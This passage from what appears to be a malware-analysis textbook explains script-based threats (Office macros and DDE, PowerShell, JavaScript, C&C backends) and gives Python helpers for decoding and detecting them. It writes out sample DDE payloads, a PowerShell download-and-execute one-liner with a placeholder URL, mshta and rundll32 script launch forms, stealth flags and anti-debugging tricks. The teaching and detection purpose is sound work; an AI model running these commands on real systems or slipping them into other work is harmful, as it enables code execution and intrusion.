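If OffVis is not at hand, the hsState change described earlier can also be scripted. The following Python sketch walks the BIFF8 records of a Workbook stream and clears the hsState bits of every BoundSheet8 record (type 0x0085), following the record layout in the [MS-XLS] specification. It assumes that the stream has already been extracted from the OLE container and will be written back afterwards (neither step is shown), and that the workbook is not encrypted. unhide_sheets is a hypothetical helper name.

```python
import struct

BOUNDSHEET8 = 0x0085  # BIFF8 record type of BoundSheet8
HS_STATE_MASK = 0x03  # hsState lives in the two low bits of the byte after lbPlyPos


def unhide_sheets(workbook_stream: bytes):
    """Return (patched_stream, number_of_sheets_unhidden)."""
    data = bytearray(workbook_stream)
    offset = 0
    unhidden = 0
    # Every BIFF8 record starts with a 2-byte type and a 2-byte length
    while offset + 4 <= len(data):
        rec_type, rec_len = struct.unpack_from('<HH', data, offset)
        body = offset + 4
        if rec_type == BOUNDSHEET8 and rec_len >= 6:
            state = body + 4  # skip the 4-byte lbPlyPos field
            if data[state] & HS_STATE_MASK:  # 1 = hidden, 2 = very hidden
                data[state] &= ~HS_STATE_MASK & 0xFF  # 0 = visible
                unhidden += 1
        offset = body + rec_len
    return bytes(data), unhidden
```

Only the two hsState bits are changed, so the record lengths and stream size stay the same. This matters when the patched stream has to replace the original inside the container.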

That’s it for XLM macros. We have already learned a lot about macro-based threats, so now, it is time to cover other ways in which malware may achieve its goals by misusing MS Office documents.

Besides macros

There are other methods that attackers may use to execute code once the document is opened. One approach is the mouse click/mouse over technique, which executes a command when the user clicks on or moves the mouse over a crafted object in PowerPoint.

This can be done by assigning the corresponding action to it, as follows:

Figure 10.19 – Adding an action to an object in PowerPoint

The good news is that updated versions of Microsoft Office should have a protected view (read-only access) security feature enabled, which will warn a user about a potential external program’s execution if the document came from an unsafe location. In this case, it will be all about social engineering – whether the attacker succeeds in convincing the victim to ignore or disable all warnings.

Another, less common, way in which malware may achieve execution is by using Setting Content files. These are XML-based files that can be executed on their own (with a .SettingContent-ms file extension) or embedded into other documents, and their DeepLink tag can be used to specify the command to be executed. After the first few attempts to misuse this functionality, Microsoft promptly hardened this feature, and we no longer see much malware targeting it.

Finally, the Dynamic Data Exchange (DDE) functionality can also be used to execute malicious commands. One way it can do this is by adding a DDEAUTO field with the command to execute, specified as the argument. Another way this functionality can be misused is by using particular syntax in Microsoft Excel. In this case, a malicious file will contain the command crafted in the following way:

(+|-|=)<command_to_execute>|'<optional_arguments_prepended_by_space>'!<row_or_column_or_cell_number>

Alternatively, the command can be passed as an argument to a built-in benign function such as SUM. Here are some example payloads that execute calc.exe after the user’s confirmation:

=calc|' '!A
+cmd|' /c calc.exe'!7
@SUM(calc|' '!Z99)
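
The syntax above is regular enough to search for. A rough Python sketch is shown below. It assumes that the cell formulas have already been extracted as strings. The pattern approximates the syntax shown above rather than everything Excel accepts, and find_dde_payloads is a hypothetical name:

```python
import re

# <prefix><optional function(>command|'arguments'!reference, as described above
DDE_FORMULA = re.compile(
    r"^[=+\-@]\s*"                    # formula prefix
    r"(?:[A-Za-z.]+\(\s*)?"           # optional wrapping function, e.g. SUM(
    r"(?P<command>[\w.:\\]+)\|"       # program to launch, e.g. cmd or calc
    r"'(?P<args>[^']*)'!"             # quoted arguments
    r"(?P<ref>[A-Za-z]*\d*)"          # row, column, or cell reference
)


def find_dde_payloads(cells):
    """Return (command, arguments, reference) for every DDE-style formula."""
    hits = []
    for cell in cells:
        match = DDE_FORMULA.match(cell.strip())
        if match:
            hits.append((match['command'], match['args'].strip(), match['ref']))
    return hits
```

Applied to the three payloads above, it reports calc, cmd with /c calc.exe, and calc again, while an ordinary formula such as =SUM(A1:A3) is ignored.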

Here is an example of the warning message that’s displayed by Microsoft Excel when this technique is used:

Figure 10.20 – An example of a Microsoft Excel warning box related to potential code execution

The msodde tool (part of oletools) may help in detecting such techniques in samples.

While any code execution here requires user confirmation, it remains a possible attack vector with the help of social engineering.

Now that we’ve mastered macro-based threats, it is time to talk about another scripting language commonly misused by attackers these days – PowerShell!

The power of PowerShell

PowerShell represents an ongoing evolution of Windows shell and scripting languages. Its powerful functionality, access to .NET methods, and deep integration with recent versions of Windows have drastically increased its popularity among both regular users and malicious actors. From the attacker’s point of view, it has many other advantages, especially in terms of obfuscation, which we are going to cover in great detail. Additionally, because the whole script can be encoded and executed as a single command, no script files need to touch the hard disk, which leaves minimal traces for forensic experts.

Let’s start with the peculiarities of its syntax.

Basic syntax

PowerShell command-line arguments provide unique opportunities for the attackers because of certain characteristics of their implementation. For example, PowerShell understands even truncated arguments and the associated parameters, so long as they are not ambiguous. Let’s go through some of the most common values that are used when executing the malicious code:

  • -NoProfile (often referred to as -NoP): This skips loading the PowerShell profile, which is useful because execution is then not affected by local settings.
  • -NonInteractive (often referred to as -NonI): This doesn’t present an interactive prompt; it is useful when the purpose is to execute specified commands only.
  • -ExecutionPolicy (often referred to as -Exec or -EP): This is often used with the Bypass argument to ignore settings that limit certain PowerShell functionality. It can also be achieved by many other approaches; for example, by modifying PowerShell’s execution policy registry value.
  • -WindowStyle (often referred to as -Win or -W): This is usually used by attackers with a Hidden (or 1) argument to hide the corresponding window for stealth purposes.
  • -Command (often referred to as -C): This executes a command provided in a command line.
  • -EncodedCommand (often referred to as -Enc, -EC, or -E): This executes a command provided in the command line as a base64-encoded UTF-16LE string.

In the preceding examples, the command-line arguments can be truncated to any number of letters and still be valid for PowerShell. For example, -NoProfile and -NoProf, or Hidden and Hidde, will be processed in the same way.
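
Because -EncodedCommand expects base64 over UTF-16LE text, such command lines can be decoded offline without running PowerShell. The following Python sketch assumes that the flag is written as -EC or as any prefix of EncodedCommand, which covers -E and -Enc. Other spellings and obfuscated dash characters are not handled, and decode_encoded_command is a hypothetical name:

```python
import base64
import re

# A flag (-Name or /Name) followed by a base64-looking value
FLAG_WITH_VALUE = re.compile(r'(?:^|\s)[-/](\w+)\s+([A-Za-z0-9+/=]+)')


def decode_encoded_command(command_line: str):
    """Decode the -EncodedCommand argument (or a truncation of it), if present."""
    for flag, value in FLAG_WITH_VALUE.findall(command_line):
        flag = flag.lower()
        # -ec is an accepted alias; otherwise any prefix of 'encodedcommand' (-e, -enc, ...)
        if flag == 'ec' or 'encodedcommand'.startswith(flag):
            # -EncodedCommand expects base64 over UTF-16LE text
            return base64.b64decode(value).decode('utf-16-le')
    return None
```

Flags such as -ExecutionPolicy or -W are skipped because they are not prefixes of EncodedCommand.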

Regarding the syntax, let’s look at some commands that are often misused by attackers.

Native cmdlets:

  • Invoke-Expression (iex): This executes a statement provided as an argument; it is very similar to the eval function in JavaScript.
  • Invoke-Command (icm): This is often used with the -ScriptBlock argument to achieve pretty much the same functionality as Invoke-Expression.
  • Invoke-WebRequest (iwr): This sends a web request; for example, it could send a request to interact with the C&C.
  • ConvertTo-SecureString: This is commonly used for decrypting an embedded script.

.NET-based methods:

  • From the [System.Net.WebClient] class, we have the following:
    • DownloadString: This downloads a string and stores it in memory, for example, a new command or a script to execute.
    • DownloadData: This is less often used by attackers; it downloads the payload as a byte array.
    • DownloadFile: This downloads a file to disk, for example, a new malicious module.

Each of these methods has an async version as well, with the corresponding name suffix (such as DownloadStringAsync).

  • From the [System.Net.WebRequest], [System.Net.HttpWebRequest], [System.Net.FileWebRequest], and [System.Net.FtpWebRequest] classes, we have the following:
    • Create (also CreateDefault and CreateHttp): This creates a web request to the server.
    • GetResponse: This sends a request and gets a response, such as with a new malicious module. Versions with the Async suffix and the Begin and End prefixes are also available for asynchronous operations (such as BeginGetResponse or GetResponseAsync), but they are rarely used by attackers.
    • GetRequestStream: This returns a stream for writing data to the internet resource – to exfiltrate some valuable information or send infection statistics, for example. Versions with the Async suffix and the Begin and End prefixes are available as well.
  • From the [System.Net.Http.HttpClient] class, we have the following:
    • GetAsync, GetStringAsync, GetStreamAsync, GetByteArrayAsync, PostAsync, and PutAsync: These are multiple options for sending any type of HTTP request and getting a response back.
  • The [System.IO.Compression.DeflateStream] and [System.IO.Compression.GZipStream] classes are commonly employed to decompress the embedded shellcode after decoding it using the base64 algorithm. They are usually used with the [System.IO.Compression.CompressionMode]::Decompress parameter as an argument for an [System.IO.StreamReader] object (see the following screenshot for an example).
  • From the [System.Convert] class, we have the following:
    • FromBase64String: This decodes base64-encoded strings, such as the next-stage payload.
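
The decoding chain described above (FromBase64String, then DeflateStream or GZipStream, then StreamReader) can be reproduced offline. Here is a minimal Python sketch. It relies on the fact that DeflateStream handles raw DEFLATE data without a zlib header. It also assumes that the decompressed text is UTF-8, which is StreamReader's default. The function name is hypothetical:

```python
import base64
import gzip
import zlib


def decode_compressed_payload(b64_text: str, method: str = 'deflate') -> str:
    """Mimic FromBase64String + DeflateStream/GZipStream + StreamReader."""
    raw = base64.b64decode(b64_text)
    if method == 'deflate':
        # DeflateStream works on raw DEFLATE data (no zlib header), hence negative wbits
        data = zlib.decompress(raw, -zlib.MAX_WBITS)
    elif method == 'gzip':
        data = gzip.decompress(raw)
    else:
        raise ValueError('method must be "deflate" or "gzip"')
    # StreamReader defaults to UTF-8 and honours a BOM, so strip one if present
    return data.decode('utf-8-sig')
```

If zlib.decompress fails with a header error, the payload was most likely produced with GZipStream. In that case, the gzip branch (or a check for the 1f 8b magic bytes) is the next thing to try.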

For .NET namespaces, the System. prefix can be safely omitted, as follows:

Figure 10.21 – An example of a Veil payload

As we can see, using a combination of compression and base64 encoding is a very popular technique among attackers to store the next stage payload and, in this way, complicate the analysis and detection. We will talk about other obfuscation techniques in greater detail in the next section. Here is an example of the code downloading the payload and executing it:

iex(new-object net.webclient).downloadstring('http://<url>/payload.bin')

Just like command-line arguments, cmdlet parameter names can be truncated so long as this creates no ambiguity. The Get-Command/gcm cmdlet with wildcards can be used by the analyst to identify the full name of a command and can also be used by attackers to resolve command names dynamically.

PowerShell can also be used to execute custom .NET code. In particular, the Add-Type -TypeDefinition <variable_storing_source_code> syntax can be used to compile .NET source code dynamically within the PowerShell script so that it can be used straight away. In Windows PowerShell, the csc.exe compiler is invoked behind the scenes for this purpose.

The notorious PowerShell-based Bluwimps stores information in WMI management classes. This makes it harder to detect using traditional antivirus solutions, and it can remotely execute code using the Windows Management Instrumentation Command (WMIC) instead of utilizing the more widely used psexec tool.

Obfuscation

There are multiple open source tools available online that can generate and/or obfuscate PowerShell-based payloads for penetration testing. This list includes, but is not limited to, the following:

  • PowerSploit
  • PowerShell Empire
  • Nishang
  • MSFvenom (part of Metasploit)
  • Veil
  • Invoke-Obfuscation

As we know, PowerShell commands are executed through the Windows console, so pretty much any obfuscation technique we described previously can be applied here as well. In addition to this, several other simple obfuscation tricks have proved to be popular:

  • Multiple string concatenations, either using the basic + operator with literal values or variables storing them, or using the Join or Concat functions.
  • Excessive single quotes, double quotes, and backticks (the PowerShell escape character).
  • split and join usage, as shown here:

    (<value_with_separators>.split("<separator>") -join "") | iex

  • String reversal (generally, either by reading a reversed string from the end or by casting it to an array and using [Array]::Reverse; regex with the RightToLeft option is used more rarely).
  • The use of [Char]<numeric_value> or ToInt<int_size> syntaxes instead of the symbols themselves.
  • A combination of compression and base64 encoding using the aforementioned methods (see Figure 10.21 for an example).
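
Several of these tricks can be undone mechanically. The following Python sketch assumes the script uses only the simple forms listed above. It strips backticks placed before ordinary letters (keeping the Windows PowerShell escape letters a, b, f, n, r, t, and v), turns [char] casts into literals, and folds + concatenations of quoted strings. It ignores quoting context (for example, backticks inside single-quoted strings are literal in PowerShell), so treat its output as a reading aid. simplify_powershell is a hypothetical name:

```python
import re

# Backtick before a letter, except Windows PowerShell escapes (`a `b `f `n `r `t `v);
# upper-case forms are kept too, to stay on the safe side
USELESS_TICK = re.compile(r'`(?=[A-Za-z])(?![abfnrtvABFNRTV])')
# [char]73 or [char]0x49
CHAR_CAST = re.compile(r'\[char\]\s*(0x[0-9a-f]+|\d+)', re.IGNORECASE)
# Double-quoted strings with nothing that could be expanded or escaped
PLAIN_DQ = re.compile(r'"([^"$`\']*)"')
# Two single-quoted literals joined by + ('' is an escaped quote)
SQ_CONCAT = re.compile(r"'((?:[^']|'')*)'\s*\+\s*'((?:[^']|'')*)'")


def simplify_powershell(script: str) -> str:
    script = USELESS_TICK.sub('', script)

    def char_to_literal(match):
        value = match.group(1)
        code = int(value, 16) if value.lower().startswith('0x') else int(value)
        return "'" + chr(code).replace("'", "''") + "'"

    script = CHAR_CAST.sub(char_to_literal, script)
    # Normalize plain double-quoted strings to single quotes so they can be folded
    script = PLAIN_DQ.sub(r"'\1'", script)
    # Fold concatenations one pair at a time until nothing changes
    while True:
        folded = SQ_CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script, count=1)
        if folded == script:
            return script
        script = folded
```

For instance, i`e`x becomes iex, and [char]73+'EX' becomes 'IEX'.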

In terms of encryption, the following approaches have proved to be popular:

  • The -bxor bitwise operator for simple XOR-based encryption.
  • The ConvertTo-SecureString cmdlet for converting the encrypted block into a secure string, which stores information in an encrypted form in memory. It is often used with the following code block to access the actual value inside the secure string:

    [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR(<secure_string>))

For this cmdlet, the decryption key can be provided in either a -key or a -securekey argument (or perhaps something like -kE).

To handle them, you must identify the algorithm that’s being used and then reverse the logic using the information available. Writing simple scripts in your language of choice is one option, but in many cases, the online CyberChef tool alone is enough.
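
For the -bxor case, a few lines of Python are usually enough. This sketch assumes a repeating-key XOR over bytes. For the brute-force helper, it also assumes a one-byte key and a known plaintext marker: here, b'http', on the assumption that the decrypted script downloads something. Both function names are hypothetical:

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the same operation as applying -bxor to each byte."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def brute_force_single_byte(data: bytes, marker: bytes = b'http'):
    """Yield (key, plaintext) for every one-byte key whose output contains marker."""
    for key in range(256):
        candidate = xor_bytes(data, bytes([key]))
        if marker in candidate.lower():
            yield key, candidate
```

Because the marker is compared case-insensitively, a key that only flips letter case (the real key XOR 0x20) may also be reported. Checking the few candidates by eye settles it quickly.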

Let’s talk about what other tools we can use to facilitate the analysis.

Static and dynamic analysis

PowerShell has a powerful built-in help system that can be used to get the description of any command by executing a Get-Help <command_name> statement:

Figure 10.22 – Getting a description for a PowerShell command

Overall, deobfuscation and decoding operations mainly require only a basic set of skills, such as decoding base64, decompressing deflate and gzip data, removing meaningless characters, replacing variables with their values, and reading truncated commands. Any text editor with PowerShell syntax highlighting can be used for static analysis in this case.
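
Replacing variables by hand gets tedious quickly. As a minimal sketch, the following Python helper inlines variables and drops their assignments. It assumes that each variable is assigned a single-quoted literal, on its own line, only once. inline_string_variables is a hypothetical name:

```python
import re

# $name = 'literal' on a line of its own (single-quoted values only)
ASSIGNMENT = re.compile(r"^[ \t]*\$(\w+)[ \t]*=[ \t]*'([^']*)'[ \t]*;?[ \t\r]*$", re.MULTILINE)


def inline_string_variables(script: str) -> str:
    """Replace $name references with the literal assigned to them, then drop the assignments."""
    values = dict(ASSIGNMENT.findall(script))
    body = ASSIGNMENT.sub('', script)
    for name, value in values.items():
        # PowerShell variable names are case-insensitive; \b stops $u from matching $url
        reference = re.compile(r'\$' + re.escape(name) + r'\b', re.IGNORECASE)
        body = reference.sub(lambda _m, v=value: "'" + v + "'", body)
    return '\n'.join(line for line in body.splitlines() if line.strip())
```

Running simplify-style passes and this helper alternately often peels several layers, because each inlined value may expose a new concatenation.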

While XOR-encrypted data can be decrypted in multiple ways, the easiest way to handle embedded PowerShell encryption is through dynamic analysis in the PowerShell Integrated Scripting Environment (ISE). In this case, code that dumps the decrypted string to disk is added straight after the decryption block. For this purpose, the Set-Content, Add-Content, and Out-File cmdlets, along with the pipe symbol (|) or the classic > and >> output redirection operators, can be used:

powershell -c "$a='secret'; $a | set-content 'output.txt'"

Alternatively, the Write-Host cmdlet can be used to write the decrypted output to the console and then redirect it to a file. Finally, a great tool called PSDecode can be used to quickly try to handle obfuscation automatically (this may involve code execution, so use it with care).

Now, it is time to talk about JavaScript-based threats.

Handling JavaScript

JavaScript is a web language that powers billions of pages on the internet, so it is no surprise that it is commonly used to create exploits that target web users. However, on Windows, it is also possible to execute JScript (Microsoft’s dialect of ECMAScript, which is very similar to JavaScript) files through Windows Script Host, which also makes it a good candidate for malicious attachments and post-compromise scripting. For example, a fileless threat called Poweliks uses JScript code stored in the registry to achieve persistence without leaving separate files on disk.

Since there are only minor differences between JavaScript and JScript, here, we will cover syntax that is common to both of them. From now on, we will use the JavaScript notation.

The standard file extension for JavaScript files is .js; encoded JScript files have the .jse extension. Additionally, scripts can be embedded into .wsf and .hta files in the same way as VBScript. As with VBScript, on Windows, both .js/.jse and .wsf files can be executed locally by wscript.exe and cscript.exe, while .hta files are executed by mshta.exe. There are several ways to execute inline JavaScript scripts:

mshta javascript:<script_body>

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";<script_body>

In addition to this, on Windows, it is possible to execute JavaScript code using regsvr32.exe as a COM scriptlet (.sct files). On Linux, multiple options are available for executing JavaScript files from the console, such as phantomjs, and, of course, the JavaScript code can be executed in full-fledged browsers. We will cover this in more detail in the Static and dynamic analysis section.
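
When triaging process creation logs, the launch methods above can be flagged with simple patterns. The rules in this Python sketch are illustrative assumptions rather than a complete detection set. For instance, the regsvr32 rule keys on scrobj.dll, the Windows Script Component runtime that handles .sct files. classify_command_line is a hypothetical name:

```python
import re

# Hypothetical triage rules for the script launch methods described above
SCRIPT_LAUNCHERS = {
    'mshta inline script': re.compile(r'\bmshta(?:\.exe)?\s+["\']?(?:java|vb)script:', re.I),
    'rundll32 mshtml trick': re.compile(
        r'\brundll32(?:\.exe)?\s+["\']?javascript:.*RunHTMLApplication', re.I),
    'regsvr32 scriptlet': re.compile(r'\bregsvr32(?:\.exe)?\b.*\bscrobj\.dll\b', re.I),
    'Windows Script Host': re.compile(r'\b[wc]script(?:\.exe)?\s.*\.(?:js|jse|wsf)\b', re.I),
}


def classify_command_line(command_line: str):
    """Return the names of all rules that match the command line."""
    return [name for name, rule in SCRIPT_LAUNCHERS.items() if rule.search(command_line)]
```

A match here only means the command line deserves a closer look. Legitimate administration scripts can trigger the Windows Script Host rule as well.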

Basic syntax

If the script is going to be executed locally, particular attention should be paid to operations that reveal its purpose, persistence mechanism, and communication protocol. As with VBScript, on Windows, the same COM objects described previously can be used for this purpose:

Figure 10.23 – An example of JavaScript code writing data to a file on Windows

On Linux, JavaScript is rarely used to execute commands locally, as this requires a runtime such as Node.js, which may not be available on the target system.

In terms of web applications, the following functions need to be paid attention to:

Code execution:

  • eval: Executes a script block provided as an argument

Page redirects:

There are multiple options here, as shown in the following code block:

  • window.location = '<new_url>';
  • window.location.href = '<new_url>';
  • window.location.assign('<new_url>');
  • window.location.replace('<new_url>'); // overwrites current page in the browser history

Important note

The window. part can commonly be omitted.

  • self.location = '<new_url>';
  • top.location = '<new_url>';
  • document.location = '<new_url>';

    Important note

    There are also possible derivatives for them, similar to the window.location-based techniques mentioned previously.

Apart from that, there is also another way to redirect the user without using JavaScript:

  • <meta http-equiv="refresh" content="<num_of_seconds>; url=<new_url>">

External script loading:

  • <script src="<name>.js"></script>
  • var script = document.createElement('script'); script.src = <something>; document.head.appendChild(script);

Web requests to remote machines:

  • The XMLHttpRequest object:
    • open: A method to create a request
    • send: A method to send a request
    • responseText: A property to access the server response
  • fetch: A newer, promise-based API for sending and processing HTTP requests, defined by the WHATWG Fetch Standard rather than by ECMAScript.

Popular libraries such as jQuery and custom implementations of Asynchronous JavaScript and XML (Ajax) usually rely on XMLHttpRequest, and sometimes on fetch, under the hood.
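
To get a quick overview of a large script before reading it, you can search for the APIs listed above. The Python sketch below is a rough line-based scanner. Its patterns are assumptions that will miss obfuscated references such as window['ev' + 'al'], so it only helps decide where to look first. scan_js is a hypothetical name:

```python
import re

# Hypothetical patterns for the APIs listed above; string-level obfuscation
# (e.g. window['ev' + 'al']) will slip past them
SUSPICIOUS_JS = {
    'code execution': re.compile(r'\beval\s*\('),
    'page redirect': re.compile(
        r'\blocation(?:\.href)?\s*=(?!=)|\blocation\.(?:assign|replace)\s*\('),
    'meta refresh': re.compile(r'http-equiv\s*=\s*["\']?refresh', re.I),
    'script loading': re.compile(
        r'createElement\s*\(\s*["\']script["\']\s*\)|<script[^>]*\bsrc\s*=', re.I),
    'web request': re.compile(r'\bXMLHttpRequest\b|\bfetch\s*\('),
}


def scan_js(source: str):
    """Return (line_number, category) pairs for lines that hit any pattern."""
    findings = []
    for line_number, line in enumerate(source.splitlines(), start=1):
        for category, pattern in SUSPICIOUS_JS.items():
            if pattern.search(line):
                findings.append((line_number, category))
    return findings
```

Running it on a beautified copy of the script gives more precise line numbers, since minified code often puts everything on a single line.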

Anti-reverse engineering tricks

The most common JavaScript obfuscation technique, employed with some variations, is dynamically building the next layer of JavaScript code, either by decrypting it or by assembling it from integers, and then executing it using the eval function or injecting it into the page using document.write:

Figure 10.24 – Obfuscated JavaScript-based threat
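
When the next layer is assembled from integers, a common choice is to turn them into text with String.fromCharCode. Such calls can often be decoded statically, without executing anything. This Python sketch assumes that fromCharCode is called with literal decimal or hexadecimal numbers only. Computed arguments are left as they are, and decode_from_char_code is a hypothetical name:

```python
import json
import re

NUMBER = r'(?:0[xX][0-9a-fA-F]+|\d+)'
# String.fromCharCode(...) called with literal numbers only
FROM_CHAR_CODE = re.compile(
    r'String\.fromCharCode\(\s*(' + NUMBER + r'(?:\s*,\s*' + NUMBER + r')*)\s*\)')


def decode_from_char_code(source: str) -> str:
    """Replace String.fromCharCode(n1, n2, ...) with the string literal it builds."""
    def to_literal(match):
        codes = []
        for token in match.group(1).split(','):
            token = token.strip()
            codes.append(int(token, 16) if token.lower().startswith('0x') else int(token))
        # fromCharCode keeps only the low 16 bits of each number
        text = ''.join(chr(code & 0xFFFF) for code in codes)
        # json.dumps yields a double-quoted, escaped literal that is also valid JavaScript
        return json.dumps(text)

    return FROM_CHAR_CODE.sub(to_literal, source)
```

For example, eval(String.fromCharCode(97,108,101,114,116,40,49,41)); becomes eval("alert(1)");, so the next layer can be read without running it.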

However, several other techniques are widely used by malware authors:

  • Storing data required for successful decryption in a separate block or file: In this case, obtaining only the decryption function may not be enough, as it relies on another piece of data stored externally.
  • Checking the execution time: This approach aims to disrupt dynamic analysis, since code takes much longer to execute when it is being debugged. For this purpose, the performance.now() or Date.now() functions are used.
  • Logging the sequence of executed functions: Here, malware behaves differently if the sequence has changed; for example, by using the arguments.callee property.
  • Redefining the functions used in dynamic analysis: A good example of this can be redefining the console.log function:

    window['console']['log'] = <other_function>;

Alternatively, it is possible to redefine the function as follows:

var console = {};

console.log = <other_function>;

  • Detecting developer tools: There are multiple ways this can be implemented, such as by comparing the window’s inner and outer sizes (docked developer tools reduce the inner size).

There are other techniques as well, but these are used in malware most often.

Static and dynamic analysis

With web development on the rise, there are plenty of tools for analyzing and debugging JavaScript code, from basic text editors with syntax highlighting to quite sophisticated packages. However, a developer’s use cases are quite different from a reverse engineer’s, which ultimately determines the set of tools each of them uses.

First of all, to speed up the analysis, it makes sense to reformat the existing JavaScript code so that its logic is easier to follow. Multiple tools serve this purpose, and some of them, such as jsbeautifier, also contain basic unpacking and deobfuscation logic.

In terms of generic dynamic analysis, embedded browser toolsets such as Chrome Developer Tools and Firefox Developer Tools are extremely handy. To use them, a small HTML block needs to be written to load the JavaScript file of interest.
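
Such a harness page can be generated for each sample. This Python sketch assumes that the sample sits in its own folder inside an isolated analysis VM. It places a debugger; statement before the sample, so that execution pauses when the developer tools are already open. The file name harness.html and both function names are hypothetical:

```python
import html
from pathlib import Path

HARNESS_TEMPLATE = """<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>analysis harness</title></head>
<body>
<!-- Execution pauses here if the developer tools are already open -->
<script>debugger;</script>
<script src="{src}"></script>
</body>
</html>
"""


def build_harness(script_name: str) -> str:
    """Return an HTML page that loads script_name from the same folder."""
    return HARNESS_TEMPLATE.format(src=html.escape(script_name))


def write_harness(sample_path: str) -> Path:
    """Write harness.html next to the sample so the relative src resolves."""
    sample = Path(sample_path)
    harness = sample.with_name('harness.html')
    harness.write_text(build_harness(sample.name), encoding='utf-8')
    return harness
```

Opening the resulting page with the developer tools already open stops execution before the sample's first statement. From there, breakpoints can be set in the loaded script.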

Here, the JavaScript code is embedded into the page itself:

Figure 10.25 – An example of the embedded JavaScript code in Chrome Developer Tools

Here is the externally loaded JavaScript script in Firefox:

Figure 10.26 – An example of the external JavaScript script in Firefox Developer Tools

In addition to this, several customized tools implement the functionality required for malware analysis. One of them is Malzilla; this free toolset combines multiple smaller tools that aim to make analysis easier by implementing the most common operations required. While relatively old, it is still used by many malware analysts to quickly go through obfuscation layers and extract the actual functionality.

The most commonly used functionality of Malzilla is the module that can intercept the eval call and output its argument to the screen. This is an extremely useful feature as most obfuscation techniques build up the actual payload before executing it using this function. This means that this is the point where the decrypted or deobfuscated logic becomes available, sometimes after a few iterations. It also includes various smart decoders that drastically speed up the analysis:

Figure 10.27 – Malzilla decoders
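
The same interception idea can also be applied by hand: replace eval with a function that prints its argument, then run the script in a controlled environment. A minimal Python sketch of the rewriting step follows. It only catches direct eval( calls, so aliases such as var e = eval; or window['eval'] are missed. It also changes behavior if the script uses the value returned by eval. neutralize_eval is a hypothetical name:

```python
import re

# eval( not preceded by a word character, '.', or '$', so myeval( and obj.eval( are untouched
EVAL_CALL = re.compile(r'(?<![\w.$])eval\s*\(')


def neutralize_eval(source: str, sink: str = 'console.log') -> str:
    """Replace direct eval( calls with sink( so the next layer is printed, not run."""
    return EVAL_CALL.sub(lambda _m: sink + '(', source)
```

After each run, the printed layer can be fed through the same function again until no eval calls remain.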

Another example of such a tool is the more recent JSDetox project. It aims to facilitate static analysis and handle JavaScript obfuscation techniques. Unlike Malzilla, it is more focused on the Linux environment:

Figure 10.28 – The JSDetox website describing its functionality

Now, let’s talk about the backend code.

Behind C&C – even malware has its own backend

Many malware families use some sort of C&C server to receive updates or custom commands from the malicious actor or to exfiltrate stolen data. Getting access to these backend files can give researchers and law enforcement agencies a lot of information about how malware works and who the victims are. Sometimes, it can even lead to the actual people behind the attack! Therefore, properly and promptly analyzing the code obtained from the C&C is an important task that researchers have to face from time to time, so it’s better to be ready!

Things to focus on

So long as the analyst has access to the code, it makes sense to prepare and prioritize a list of questions to answer. Generally, the following knowledge can be obtained from the backend:

  • Is it actual backend code or a proxy redirecting messages to another location? What URI or port does the malware use?
  • What is the format of the accepted requests or messages and is there any encryption involved?
  • Are there any commands that it can return to the malware, either automatically or on demand?
  • Can it issue self-destruction commands and is there any form of authentication for them?
  • Is there a web interface or dashboard available for the attacker?
  • What are the locations for the logs, the additional payloads delivered, and the stolen data?
  • Are there any statistics about affected users available?
  • Are there any logs that will reveal the malware writer’s identity? The SSH or RDP/custom RAT logs may help answer this question.

More advanced steps include searching for communication patterns that may help identify future C&Cs. If the HTTPS protocol was used, it may make sense to check where the corresponding certificate came from.

Static and dynamic analysis

Multiple programming languages can be used to implement a backend. Whether it is PHP, Perl, Python, or something else, you need to correctly identify the programming language and check whether an existing framework is used. The first part of this task can usually be solved by looking at the file extensions. For the second part, the configuration files or directories will usually contain the name of the framework used.
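
The identification step can be partly automated. The following Python sketch counts source files per language by extension and lists well-known marker files. The mappings are illustrative assumptions: for example, an artisan file usually indicates Laravel, and manage.py usually indicates Django. Both function names are hypothetical:

```python
from collections import Counter
from pathlib import Path, PurePosixPath

# Illustrative mappings only; extend them for the backend at hand
EXTENSION_LANGUAGE = {
    '.php': 'PHP', '.pl': 'Perl', '.pm': 'Perl', '.py': 'Python',
    '.rb': 'Ruby', '.js': 'JavaScript', '.go': 'Go', '.aspx': 'ASP.NET',
}
FRAMEWORK_MARKERS = {
    'composer.json': 'PHP (Composer project)', 'artisan': 'Laravel',
    'wp-config.php': 'WordPress', 'manage.py': 'Django',
    'requirements.txt': 'Python dependencies', 'package.json': 'Node.js project',
    'Gemfile': 'Ruby (Bundler)', 'web.config': 'IIS / ASP.NET',
}


def profile_files(relative_paths):
    """Count files per language and list marker files for the given relative paths."""
    languages = Counter()
    markers = []
    for rel in relative_paths:
        path = PurePosixPath(rel)
        language = EXTENSION_LANGUAGE.get(path.suffix.lower())
        if language:
            languages[language] += 1
        if path.name in FRAMEWORK_MARKERS:
            markers.append((str(path), FRAMEWORK_MARKERS[path.name]))
    return languages.most_common(), sorted(markers)


def profile_backend(root: str):
    """Walk a copy of the backend and profile every regular file in it."""
    root_path = Path(root)
    return profile_files(p.relative_to(root_path).as_posix()
                         for p in root_path.rglob('*') if p.is_file())
```

The output is only a starting point. The configuration files it points to still need to be read to confirm the framework and its version.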

Installing the corresponding IDE and loading the project there will drastically speed up further analysis as it will facilitate efficient static and dynamic analysis.

Other script languages

In this chapter, we covered the most common examples of languages used nowadays. But what if you encounter something more exotic that you don’t have a ready step-by-step tutorial for? Or what if a new script language becomes increasingly popular, is available on lots of systems, and is, therefore, misused by malicious actors? Don’t panic – we have summarized the ideas that will help you successfully analyze any new threat.

Where to start

Here is what you should do when analyzing a new threat:

  1. Identify the language. There are multiple ways to do this, as follows:
    • Look at the file extensions used
    • Use the file tool
    • Search for the header signature online
    • Check strings as they may give additional clues
  2. If the script requires some particular OS, make sure that you have a proper VM image set up.
  3. If the script language is compiled, search for tools such as decompilers or disassemblers to make static analysis possible.
  4. If the code is not compiled and the source code has been obtained, check for the best IDE or syntax highlighter available. Use your preferred solution that supports debugging to make dynamic analysis more convenient.
  5. Search for manuals on how to read the code – either the original or the one that comes with the help files for the corresponding tools. Additionally, check whether there are some APIs available.
  6. If the code is obfuscated, try existing deobfuscators if there are any. It is always possible to use code beautifiers and name replacements to make the code more readable.
  7. Check whether any dynamic analysis monitors or sandboxes are available that can log all critical functionality when the code is being executed.
